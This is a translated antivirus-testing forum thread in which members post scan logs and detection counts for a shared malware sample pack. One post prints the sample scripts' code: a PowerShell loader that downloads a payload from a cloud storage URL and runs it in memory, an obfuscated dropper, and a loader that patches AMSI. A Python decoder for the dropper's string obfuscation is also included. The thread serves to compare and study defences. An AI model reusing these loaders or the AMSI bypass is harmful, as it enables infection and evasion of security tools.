Original poster: wwwab

[Virus samples] [Open test] Kafan virus sample pack 20240714, issue 144

Nocria
Posted on 2024-7-14 21:22:56
Last edited by Nocria on 2024-7-14 21:52

IKARUS - 14/26


[14.07.2024 21:41:59] On-demand scan started: "TemporaryScan {a39a5454-a251-4cfd-9c9c-ce1b7beb2872}"
[14.07.2024 21:41:59] Found, 0.02s, SigName: "Trojan.JS.Kilim", SigId: 2320675, Type: "VIRUS", File: "C:\Users\promi\Downloads\infected2024071401\Downloads\1PDF.FaturaDetay_202407.exe"
[14.07.2024 21:42:05] Found, 1.83s, SigName: "Trojan.Win32.Crypt", SigId: 5503297, Type: "VIRUS", File: "C:\Users\promi\Downloads\infected2024071401\Downloads\arwbjuh.exe"
[14.07.2024 21:42:05] Found, 0.06s, SigName: "Trojan.PowerShell.Crypt", SigId: 4994156, Type: "VIRUS", File: "C:\Users\promi\Downloads\infected2024071401\Downloads\black.bat"
[14.07.2024 21:42:05] Found, 0.13s, SigName: "Trojan.Win32.Crypt", SigId: 5503297, Type: "VIRUS", File: "C:\Users\promi\Downloads\infected2024071401\Downloads\bjutbht.exe"
[14.07.2024 21:42:05] Found, 0.05s, SigName: "Trojan.Win32.Krypt", SigId: 501583477, Type: "VIRUS", File: "C:\Users\promi\Downloads\infected2024071401\Downloads\borlndmm.dll"
[14.07.2024 21:42:05] Found, 0.09s, SigName: "Trojan.Win32.Generic", SigId: 5401060, Type: "VIRUS", File: "C:\Users\promi\Downloads\infected2024071401\Downloads\ccleaner.exe"
[14.07.2024 21:42:05] Found, 0.05s, SigName: "Win32.SuspectCrc", SigId: 501426243, Type: "VIRUS", File: "C:\Users\promi\Downloads\infected2024071401\Downloads\DHL_PT563857935689275783656385FV-GDS3535353.bat"
[14.07.2024 21:42:07] Found, 2.01s, SigName: "Trojan.Win32.Crypt", SigId: 5503297, Type: "VIRUS", File: "C:\Users\promi\Downloads\infected2024071401\Downloads\dwvhgtd.exe"
[14.07.2024 21:42:07] Found, 0.01s, SigName: "Trojan.PowerShell.Crypt", SigId: 4242285, Type: "VIRUS", File: "C:\Users\promi\Downloads\infected2024071401\Downloads\PDF.exe"
[14.07.2024 21:42:07] Found, 0.12s, SigName: "Trojan.Win32.Crypt", SigId: 5503297, Type: "VIRUS", File: "C:\Users\promi\Downloads\infected2024071401\Downloads\file.exe"
[14.07.2024 21:42:07] Found, 0.03s, SigName: "Trojan.JS.Kilim", SigId: 2320675, Type: "VIRUS", File: "C:\Users\promi\Downloads\infected2024071401\Downloads\PDF.FaturaDetay_202407.exe"
[14.07.2024 21:42:07] Found, 0.03s, SigName: "Trojan.JS.Kilim", SigId: 2320675, Type: "VIRUS", File: "C:\Users\promi\Downloads\infected2024071401\Downloads\SIP.03746.XSLSX.exe"
[14.07.2024 21:42:07] Found, 2.21s, SigName: "Trojan.Python.SLoader", SigId: 5369181, Type: "VIRUS", File: "C:\Users\promi\Downloads\infected2024071401\Downloads\Built.exe"
[14.07.2024 21:42:08] Found, 0.48s, SigName: "Trojan.Win32.Crypt", SigId: 5292770, Type: "VIRUS", File: "C:\Users\promi\Downloads\infected2024071401\Downloads\setup.exe"
[14.07.2024 21:42:08] On-demand scan FINISHED: "TemporaryScan {a39a5454-a251-4cfd-9c9c-ce1b7beb2872}"
[14.07.2024 21:42:08] ----------------------------------------------------
[14.07.2024 21:42:08] Directories scanned: 2
[14.07.2024 21:42:08] Files scanned: 51
[14.07.2024 21:42:08] Virus found: 14
[14.07.2024 21:42:08] ----------------------------------------------------
_____________________________________

EMSISOFT - 12/26



2024/7/14 21:50:09
Scanner detected Malware "Gen:Variant.Tedy.577745 (B)" in "C:\Users\promi\Downloads\infected2024071401\Downloads\1PDF.FaturaDetay_202407.exe -> (Smart) -> 0"

2024/7/14 21:50:11
Scanner detected Malware "Gen:Variant.Tedy.577745 (B)" in "C:\Users\promi\Downloads\infected2024071401\Downloads\PDF.FaturaDetay_202407.exe -> (Smart) -> 0"

2024/7/14 21:50:11
Scanner detected Malware "Gen:Variant.Tedy.577745 (B)" in "C:\Users\promi\Downloads\infected2024071401\Downloads\SIP.03746.XSLSX.exe -> (Smart) -> 0"

2024/7/14 21:50:13
Scanner detected Malware "Gen:Variant.Doina.74764 (B)" in "C:\Users\promi\Downloads\infected2024071401\Downloads\setup.exe -> (Instyler o) -> (Instyler Module 16)"

2024/7/14 21:50:13
Scanner detected Malware "Gen:Heur.Munp.1 (B)" in "C:\Users\promi\Downloads\infected2024071401\Downloads\setup.exe -> (Instyler o) -> (Instyler Module 17)"

2024/7/14 21:50:15
Scanner detected Malware "Gen:Variant.Babar.460990 (B)" in "C:\Users\promi\Downloads\infected2024071401\Downloads\7a0395c75ac633d66a7a9f2690cbdb9c90ac5b0fc4f9273b6e0cf16f70eedd8e.exe" (SHA1: 8f4569d6233bb9ba161a68527ee9b8e8c04a63bb)

2024/7/14 21:50:15
Scanner detected Malware "Gen:Variant.Fragtor.597921 (B)" in "C:\Users\promi\Downloads\infected2024071401\Downloads\arwbjuh.exe" (SHA1: d9b9d23b2c320efcaf54ddcba8b42540f3934aa0)

2024/7/14 21:50:15
Scanner detected Malware "Trojan.Generic.36541240 (B)" in "C:\Users\promi\Downloads\infected2024071401\Downloads\borlndmm.dll" (SHA1: 8be6dfa8e216d2f7b68f2ab05e63a78fa51374f6)

2024/7/14 21:50:15
Scanner detected Malware "Trojan.GenericKD.73480402 (B)" in "C:\Users\promi\Downloads\infected2024071401\Downloads\DHL_PT563857935689275783656385FV-GDS3535353.bat" (SHA1: 880c7f14743f9759b30bcc28085949122f54c20e)

2024/7/14 21:50:15
Scanner detected Malware "Gen:Variant.Fragtor.597921 (B)" in "C:\Users\promi\Downloads\infected2024071401\Downloads\dwvhgtd.exe" (SHA1: 2c48027755783d35b163a43b62ffafba8345155d)

2024/7/14 21:50:15
Scanner detected Malware "Trojan.GenericKD.73495776 (B)" in "C:\Users\promi\Downloads\infected2024071401\Downloads\helper.bat" (SHA1: 64ab8a696b52189d5fd809da924d1dc36e07d7c3)

2024/7/14 21:50:15
Scanner detected Malware "Gen:Variant.Babar.460990 (B)" in "C:\Users\promi\Downloads\infected2024071401\Downloads\DTLite.exe" (SHA1: a7b956a4aca4624fb466a932d49fb3268a42b7e2)




Ratings (2 participants, experience +10, reputation +1):
QVM360 +10: The board is better with you here :)
天狐狐狐 +1: Thanks for the support, come by often :)

东南大学
Posted on 2024-7-14 21:26:44
Last edited by 东南大学 on 2024-7-14 21:52

CS: 11 killed on extraction, 3 killed on scan, 12 remaining
1PDF.FaturaDetay_202407.exe
3e6642f7100bb72137d68b5aa34a2d1f1a75722ab7d2b15987bbdeb84bc3265e.exe
64ec6562b96016699c6ae14166f4d31bde2b160eaa84d34a661fc2943017202e.exe
7a0395c75ac633d66a7a9f2690cbdb9c90ac5b0fc4f9273b6e0cf16f70eedd8e.exe
black.bat
borlndmm.dll
DHL_PT563857935689275783656385FV-GDS3535353.bat
DTLite.exe
helper.bat
PDF.FaturaDetay_202407.exe
setup.exe
SIP.03746.XSLSX.exe
YU2711
Posted on 2024-7-14 21:55:15
Last edited by YU2711 on 2024-7-14 23:19

Avira: extraction + scan, 19x

Double-click (behaviour blocked in every case; the files themselves were not removed)

black.bat: behaviour blocked

Remaining 2 .bat files: miss

Trend Micro: monitoring + scan, 14x

Double-click

PDF.exe: PowerShell execution blocked

black.bat

1PDF.exe, PDF.Fatura.exe, Sip03.exe, helper.bat: miss


Ratings (1 participant, experience +30):
QVM360 +30: The board is better with you here :)

驭龙
Posted on 2024-7-14 22:31:10
Norton V22, Download Insight and file monitoring: 9 remaining, not double-clicked


Ratings (1 participant, experience +5):
QVM360 +5: The board is better with you here :)

GreatMOLA
Posted on 2024-7-14 22:52:36
Last edited by GreatMOLA on 2024-7-14 22:55

Deep Instinct

Scan: 14x



Prevented | Malware - Spyware | C:\Users\User1211\Desktop\infected2024071401\Downloads\file.exe
Prevented | Malware - Trojan | C:\Users\User1211\Desktop\infected2024071401\Downloads\SIP.03746.XSLSX.exe
Prevented | Malware - Dropper | C:\Users\User1211\Desktop\infected2024071401\Downloads\PDF.exe
Prevented | Malware - Spyware | C:\Users\User1211\Desktop\infected2024071401\Downloads\arwbjuh.exe
Prevented | Malware - Spyware | C:\Users\User1211\Desktop\infected2024071401\Downloads\dwvhgtd.exe
Prevented | Malware - Trojan | C:\Users\User1211\Desktop\infected2024071401\Downloads\PDF.FaturaDetay_202407.exe
Prevented | Malware - Ransomware | C:\Users\User1211\Desktop\infected2024071401\Downloads\1PDF.FaturaDetay_202407.exe
Prevented | Malware - Virus | C:\Users\User1211\Desktop\infected2024071401\Downloads\7a0395c75...0cf16f70eedd8e.exe
Prevented | Dual Use - Investigation Tool | C:\Users\User1211\Desktop\infected2024071401\Downloads\DTLite.exe
Prevented | Malware - Dropper | C:\Users\User1211\Desktop\infected2024071401\Downloads\setup.exe
Prevented | Malware - Virus | C:\Users\User1211\Desktop\infected2024071401\Downloads\3e6642f710...eb84bc3265e.exe
Prevented | Malware - Virus | C:\Users\User1211\Desktop\infected2024071401\Downloads\ccleaner.exe
Prevented | PUA - Downloader | C:\Users\User1211\Desktop\infected2024071401\Downloads\Built.exe


Execution

PE files with the same behaviour, 8x:

Prevented | Behavioral Analysis - Remote Code Injection | C:\Users\User1211\Desktop\infected2024071401\Downloads\d87e2dcd2eb97...ce9f5ddf96d.exe
Prevented | Behavioral Analysis - Remote Code Injection | C:\Users\User1211\Desktop\infected2024071401\Downloads\a33245a27c02bb...699fe81c48a.exe
Prevented | Behavioral Analysis - Remote Code Injection | C:\Users\User1211\Desktop\infected2024071401\Downloads\901478668c0...4470f3d4.exe
Prevented | Behavioral Analysis - Remote Code Injection | C:\Users\User1211\Desktop\infected2024071401\Downloads\938b7e042bd...a826598.exe
Prevented | Behavioral Analysis - Remote Code Injection | C:\Users\User1211\Desktop\infected2024071401\Downloads\644d928a4...29c0325.exe
Prevented | Behavioral Analysis - Remote Code Injection | C:\Users\User1211\Desktop\infected2024071401\Downloads\64ec6562b96...c2943017202e.exe
Prevented | Behavioral Analysis - Remote Code Injection | C:\Users\User1211\Desktop\infected2024071401\Downloads\96d1bc7dec...fa909dd6bb7.exe
Prevented | Behavioral Analysis - Remote Code Injection | C:\Users\User1211\Desktop\infected2024071401\Downloads\4c40337...d35c354a7792.exe

Black.bat



powershell $ProgressPreference = SilentlyContinue
function LookupFunc {
    Param $moduleName, $functionName
    $assem = [AppDomain]::CurrentDomain.GetAssemblies | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split\\[-1].EqualsSystem.dll}.GetTypeMicrosoft.Win32.UnsafeNativeMethods
    $tmp = $assem.GetMethods | ForEach-Object {If$_.Name -eq GetProcAddress {$_}}
    $handle = $assem.GetMethodGetModuleHandle.Invoke$null, @$moduleName;
    [IntPtr] $result = 0;
    try {
        Write-Host First Invoke - $moduleName $functionName;
        $result = $tmp[0].Invoke$null, @$handle, $functionName;
    }catch {
        Write-Host Second Invoke - $moduleName $functionName;
        $handle = new-object -TypeName System.Runtime.InteropServices.HandleRef -ArgumentList @$null, $handle;
        $result = $tmp[0].Invoke$null, @$handle, $functionName;
    }
    return $result;
}
function getDelegateType {
    Param [ParameterPosition = 0, Mandatory = $True] [Type[]] $func,[ParameterPosition = 1] [Type] $delType = [Void]
    $type = [AppDomain]::CurrentDomain.DefineDynamicAssemblyNew-Object System.Reflection.AssemblyNameReflectedDelegate, [System.Reflection.Emit.AssemblyBuilderAccess]::Run.DefineDynamicModuleInMemoryModule, $false.DefineTypeMyDelegateType,Class, Public, Sealed, AnsiClass, AutoClass, [System.MulticastDelegate]
    $type.DefineConstructorRTSpecialName, HideBySig, Public,[System.Reflection.CallingConventions]::Standard, $func.SetImplementationFlagsRuntime, Managed
    $type.DefineMethodInvoke, Public, HideBySig, NewSlot, Virtual, $delType, $func.SetImplementationFlagsRuntime, Managed
    return $type.CreateType
}

[Byte[]] $buf = iWr -UsEb https://upnow-prod.ff45e40d1a1c8f7e7de4e976d0c9e555.r2.cloudflarestorage.com/BJkvbFojWPUQauDK61Bs1H7mPvG3/a9cbfe91-5e7f-47a9-a05c-9eaac5bb2e3c?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=cdd12e35bbd220303957dc5603a4cc8e%2F20240714%2Fauto%2Fs3%2Faws4_request&X-Amz-Date=20240714T063356Z&X-Amz-Expires=43200&X-Amz-Signature=254013c4e1bf47e1cd80433c8ed254a6448661c0be1c9d52c343bbe888f87cb6&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3D%22out.bin%22.content
$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointerLookupFunc kernel32.dll VirtualAlloc,getDelegateType @[IntPtr], [UInt32], [UInt32], [UInt32][IntPtr].Invoke[IntPtr]::Zero, $buf.length, 0x3000, 0x40
[System.Runtime.InteropServices.Marshal]::Copy$buf, 0, $lpMem, $buf.length
$hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointerLookupFunc kernel32.dll CreateThread,getDelegateType @[IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr][IntPtr].Invoke[IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointerLookupFunc kernel32.dll WaitForSingleObject,getDelegateType @[IntPtr], [Int32][Int].Invoke$hThread, 0xFFFFFFFF

borlndmm.dll

Detects virtual machines, takes no action, miss.

DHL_PT563857935689275783656385FV-GDS3535353.bat



  1. powershell.exe  -windowstyle hidden "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke(     $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ &   ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv  EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6  em4.ogi;Tylv  ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp  redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um,  U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. 
DagjC e[过滤]ebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst  cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole  o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub  ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop  Udd[Ba.iN Ddse.rdltOver.Ori,SDiadeHartcbundu Eror FreiHekst ProyRevaPwronrUn,ooTenot GipoBjr cTypeoPhycl RetTBedlyAchap .ide Sma]Repr:prec:AkklTNongl DatsPhen1Koor2Rume ');$urtesupper=$gawkihood[0];$enteroanastomosis= (Oktantals ' .le$hvidg.ykelKurtoTilkbH mpaCoutlDivi:A keMVerioSalvnUnr tSkyggstilo,istl,ammf ,raiBrowebro.rChlo=  etNdiste UnswBil,- W iOColobAbonjAutoeMongccli tForu   amS porySvedsF jlt lageDownmBrss.UnshNIn.ae I.tt.hal.Di.eWDevaeOxtabFredCPhillConfiForte.illnS.det');$enteroanastomosis+=$Mbelpoliturer[1];Oncogenes ($enteroanastomosis);Oncogenes (Oktantals 'b.gr$ .llMTutooLangnOwkrt D.ng,leao Hagl efifProti BlyeTonsrRemo.K.anHKr leUganaDrifdUdhneFe.drAcolssemi[ Fo.$EfteMB.uso PolralvevFintiSpe,nwife]Dok.=Inn,$I dvKre,nlkl.maAto,gSystekartfXylorBleniSkyfsRoletGreg ');$Makkede=Oktantals 'Unde$ PosMC.aco.xprnF.rstDemog 
lanoAmt.l,dlafSatsiPo aeHalvrJezr.SpeeDalphokiwaw Afsn.dstlVi ioLav,aWrapdPja.FGaduiS.nelGrebecons(,ell$Dec uFir,rLandtLigueHjalsNonouHavrp B spReane,roarre.s, E,s$RelaAIndifskrig MutrTalb)T.sk ';$Afgr=$Mbelpoliturer[0];Oncogenes (Oktantals 'Belr$Ln,ogOu,plEdapo PerbEx,eaSworl Des:Ud iEKig,gNonplDataaMegatAn,reStacrEskaeGro.sEkam=Flys(BygkT fr.eUnf s,rontgau.-wifoPBankaUplit .akhSelv Ked.$S.riA Bolf .umgDuchrBagg) Nav ');while (!$Eglateres) {Oncogenes (Oktantals 'K,rr$ calg Prol Ubeo An,bTra.aKernlMusl:UranD ConuSorrgOre a oinnBryg=Cen.$ForrtAfbrrUdrauR.vae Ani ') ;Oncogenes $Makkede;Oncogenes (Oktantals 'FormSldertBe.la V,rr eletTeks-BlepSLooklM.sse,entePr.npampo Olin4Macr ');Oncogenes (Oktantals 'Pidd$MissgScholFo,soAf,ib HjeaFreklCros:Vrt E A.dg.upelvendaLycot Re,ecracrDeave Subs nco=Bill(bossTAfveeUp rs lintSubs-ParaP RisaForet,andhMo.g Aarb$DecuAWoodfPatrgOculrInds) Pri ') ;Oncogenes (Oktantals 'G ur$ lgtg.efelShoooCivibBreaa UnclAppa:FaenE TaaxYethpPolylfareoLongdS.afeE,parSa.c=Scre$C mmg NemlMedioWhimb edua.ensl.nas: LocrAspeeHe,tnCanotT.skvSkibiU,kisWi,etGod,ehalonBe,o+,axc+Fini%Circ$RickgDermaMindwUndekStani C ih.renoAs.mo.ecudOpfy.SmutcflyvoRussu,ilhn PantLega ') ;$urtesupper=$gawkihood[$Exploder];}$Selvflelsers=333309;$Topfigur=29064;Oncogenes (Oktantals ' Op,$C,rrgHapplV ntodi.ibBrodaKni limpo:H,ejTRambrWigsvPonoa UnprPolee H tnKa o  Skr=Lgne  MgrGAu,ee Ra t Int-,edaCGhosoStavnTurbtMi pe spin nddtMusk Mind$ ,trAH.rsfD.srgMe,drRuts ');Oncogenes (Oktantals ' Dok$InexgDigtlU,weo flobeli,aB,dil,iot: Gl,PAn yaskoldSkj.d thae Forh Kona,lejtDihytPl deLattss,rkkItalyAkt eGentrBikonTlpeePlugsTruc h.ne=Codl Kula[HalvSS aayB.evsStagt ande orkmdimi. 
OmdCAdreoS,ren Es v.efueOverrReolt Imp]Mast: Veg: bibFsemir UnpoD,gtmTro,BStatasparsP.mpeAlmo6Hydr4gasaSSpant Me.rSlriiAsymn S ug  am(Samn$PjkkTS uir InfvGge,aFremrHumeeUnfenGa.g)Co.q ');Oncogenes (Oktantals 'Stet$SmiggOprel AneoAc,obB ysaP aslSt.m:ForvUVr ebRep,e Pt.hUni,j Di.lPo.epEp.dsCapioVarmmReplmRevieBorts Pir .aca=Di.e  Hem[Ca.bS StoyBuffsAndet Hane  nkm.hae.kanaTConne uudxBnkptYeh..sp tERechn urgc LinoTu.bd Su icompn Alcg Uo.]Erad: ini:LandAmytiSAsseC sp.ITalbIGrip.JuleG D veAlmet,istSUdflt Storbestirssnn Unfg,erc( Na.$SighPTkkeaStridDesod BoheRobihOvera S ot,asttTurneBalas MankTvisy accePsycrStranC,ple Yd,s Sp.) Glu ');Oncogenes (Oktantals 'Unf.$ rodgMar,lSlagoCarpb M.naPsyklCyli:DiscBAlg iSlanoMen lCounoStang Trie MerrTaxanMelleS was.ver1D,al9U sa6Sigi=Delp$F lmUF,rsbMed eSa,ihGarnj YellsrtrpKolos resoBattm BejmFerreAspisC.nc.Serjs JewuThrob S rsLrketTrafrRejniSergnSt dgAnti( Jai$Jer,S ProeGroclCi.ivI urf AerlUdvaeB,uglchi,sArmhe.onnrAf is nde,,rko$InddT  ecoSengpHimmfKlkkiIm.rg LytuTensrHaan)Pink ');Oncogenes $Biologernes196;"



helper.bat



powershell function Invoke-SharpLoader
{

Param

        [ParameterMandatory=$true]
        [string]
        $location,
        [ParameterMandatory=$true]
        [string]
        $password,
        [string]
        $argument,
        [string]
        $argument2,
        [string]
        $argument3,
        [Switch]
        $noArgs


$sharploader = @
using System;
using System.Net;
using System.Text;
using System.IO;
using System.Linq;
using System.Reflection;
using System.Security.Cryptography;
using System.IO.Compression;
using System.Runtime.InteropServices;

namespace SharpLoader
{
    public class gofor4msi
    {
        static byte[] x64 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
        static byte[] x86 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };

        public static void now
        {
            if is64Bit
                goforx64;
            else
                goforx86;
        }

        private static void goforbyte[] patch
        {
            try
            {
                var a = am;
                var si = si;
                var dll = .dll;
                var lib = Win32.LoadLibraryasidll;
                var Am = Am;
                var siScan = siScan;
                var Buffer = Buffer;
                var addr = Win32.GetProcAddresslib, AmsiScanBuffer;

                uint oldProtect;
                Win32.VirtualProtectaddr, UIntPtrpatch.Length, 0x40, out oldProtect;

                Marshal.Copypatch, 0, addr, patch.Length;
            }
            catch Exception e
            {
                Console.WriteLine [x] {0}, e.Message;
                Console.WriteLine [x] {0}, e.InnerException;
            }
        }

        private static bool is64Bit
        {
            bool is64Bit = true;

            if IntPtr.Size == 4
                is64Bit = false;

            return is64Bit;
        }
        class Win32
        {
            [DllImportkernel32]
            public static extern IntPtr GetProcAddressIntPtr hModule, string procName;

            [DllImportkernel32]
            public static extern IntPtr LoadLibrarystring name;

            [DllImportkernel32]
            public static extern bool VirtualProtectIntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect;
        }
    }
    public class Program
    {
        public static void PrintBanner
        {

        }
        public static string Get_Stage2string url
        {
            try
            {
                HttpWebRequest myWebRequest = HttpWebRequestWebRequest.Createurl;
                IWebProxy webProxy = myWebRequest.Proxy;
                if webProxy != null
                {
                    webProxy.Credentials = CredentialCache.DefaultNetworkCredentials;
                    myWebRequest.Proxy = webProxy;
                }
                HttpWebResponse response = HttpWebResponsemyWebRequest.GetResponse;
                Stream data = response.GetResponseStream;
                string html = String.Empty;
                using StreamReader sr = new StreamReaderdata
                {
                    html = sr.ReadToEnd;
                }
                return html;
            }
            catch Exception
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine;
                Console.WriteLine\n[!] Whoops, there was a issue with the url...;
                Console.ResetColor;
                return null;
            }
        }
        public static string Get_Stage2diskstring filepath
        {
            string folderPathToBinary = filepath;
            string base64 = System.IO.File.ReadAllTextfolderPathToBinary;
            return base64;
        }
        public static byte[] AES_Decryptbyte[] bytesToBeDecrypted, byte[] passwordBytes
        {
            byte[] decryptedBytes = null;
            byte[] saltBytes = new byte[] { 1, 2




Ratings (2 participants, experience +30, reputation +3):
QVM360 +30: Excellent!
隔山打空气 +3

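The DHL .bat above hides every string behind one routine, `Oktantals`: it walks the argument in steps of 5 starting at offset 4 and keeps `$Afiklingshastighed` characters each time, and that counter is only bumped from 0 to 1 when `${host}.CurrentCulture` is set, so in a host without a culture every string decodes to nothing. The following is an added example, not code from the post or from the sample, of that decoder rewritten in Python for analysis, applied to three of the short assignments visible in the dump (the three literal strings are copied from the post; the variable names are the sample's). It shows that `$eksileredes` is `iex` (so `Oncogenes` is just `& iex (...)`) and `$Morvin` is `User-Agent`.

```python
import re


def oktantals(blob: str, width: int = 1) -> str:
    """Re-implementation (for analysis, not the sample's own code) of the
    Oktantals routine: starting at offset 4, take `width` characters every
    5 characters while the offset stays below len(blob) - width.
    `width` stands in for $Afiklingshastighed, which the script increments
    from 0 to 1 only if ${host}.CurrentCulture is truthy; an ordinary
    PowerShell host therefore runs it with width 1."""
    out = []
    limit = len(blob) - width
    i = 4
    while i < limit:
        out.append(blob[i:i + width])
        i += 5
    return "".join(out)


# Constructed excerpt: three short assignments copied from the .bat dump above.
SAMPLE_EXCERPT = (
    "$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';"
    "$Dvelreres=Oktantals ' P o>wood ';"
    "$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';"
)

# `$var = Oktantals '<literal>'`; the dump only uses single-quoted literals here.
CALL_RE = re.compile(r"(\$\w+)\s*=\s*Oktantals\s*'([^']*)'")


def decode_assignments(script: str, width: int = 1) -> dict:
    """Map each $variable assigned from an Oktantals call to its decoded value."""
    return {var: oktantals(blob, width) for var, blob in CALL_RE.findall(script)}


if __name__ == "__main__":
    for var, value in decode_assignments(SAMPLE_EXCERPT).items():
        print(f"{var} -> {value!r}")
    # width=0 models a host with no CurrentCulture: every string decodes to ''.
    print(decode_assignments(SAMPLE_EXCERPT, width=0))
```

Running the same decoder with `width=0` is the quickest way to see why such a sample can do nothing in a sandbox whose host object lacks a culture, which is worth remembering when a dynamic run of a .bat like this one comes back clean.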
GreatMOLA
Posted on 2024-7-14 23:18:06
驭龙 posted on 2024-7-14 22:31
Norton V22, Download Insight and file monitoring: 9 remaining, not double-clicked

Same scan result here.

Execution

SONAR blocked everything; still going strong.




Ratings (2 participants, experience +10, reputation +3):
QVM360 +10: The board is better with you here :)
驭龙 +3: SONAR really is good; a pity N no longer has it

孤勇者
Posted on 2024-7-15 09:43:59
dght432 posted on 2024-7-14 19:59
Kaspersky: 5 remaining

The free version uses multi-step proactive defense and the paid version single-step proactive defense; there is no difference on known samples, but there is on unknown ones, where single-step proactive defense is superior.
wwwab
OP | Posted on 2024-7-15 10:27:00
StarlitFuture posted on 2024-7-14 21:15
COMODO 2025: TDT blocked 1, the rest went into the sandbox

@驭龙 It actually turned out to be Intel TDT Events

Ratings (1 participant, reputation +3):
驭龙 +3: TDT really does show its face only rarely; a pity it wasn't ESE.

wwwab
OP | Posted on 2024-7-15 10:42:18
swizzer posted on 2024-7-14 18:28
Huawei
Real-time protection 7/26

@华为安全官方 HUAWEI System Killer
shuiyue96
Posted on 2024-7-15 11:12:17
Norton V22, file monitoring + scan: 11 remaining, not double-clicked. Already updated to the latest version.


Ratings (1 participant, experience +5):
QVM360 +5: The board is better with you here :)
